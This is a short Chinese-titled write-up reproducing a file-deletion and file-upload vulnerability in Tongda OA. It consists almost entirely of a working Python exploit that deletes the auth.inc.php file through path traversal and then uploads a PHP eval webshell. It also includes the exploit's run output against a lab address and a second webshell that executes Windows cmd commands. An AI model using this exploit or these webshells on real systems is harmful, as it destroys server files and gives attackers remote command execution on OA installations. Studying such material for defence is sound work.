通达OA任意文件删除+文件上传漏洞复现

import requests
payload="<?php eval($_POST['t']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")target=input("Please enter URL: ")input("Press enter to continue!")print("[*]Deleting auth.inc.php....")url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page:    print("[-]Failed to deleted auth.inc.php")    exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('oatest.php', payload)}requests.post(url=url,files=files)url=target+"/_oatest.php"page=requests.get(url=url).textif 'No input file specified.' not in page:    print("[+]Filed Uploaded Successfully")    print("[+]URL:",url)else:    print("[-]Failed to upload file")

>exp.py[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OAPlease enter URL: http://192.168.0.110:8080/Press enter to continue![*]Deleting auth.inc.php....[*]Checking if file deleted...[+]Successfully deleted auth.inc.php![*]Uploading payload...[+]Filed Uploaded Successfully[+]URL: http://192.168.0.110:8080//_oatest.php

/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php

<?php$command=$_GET['cmd'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>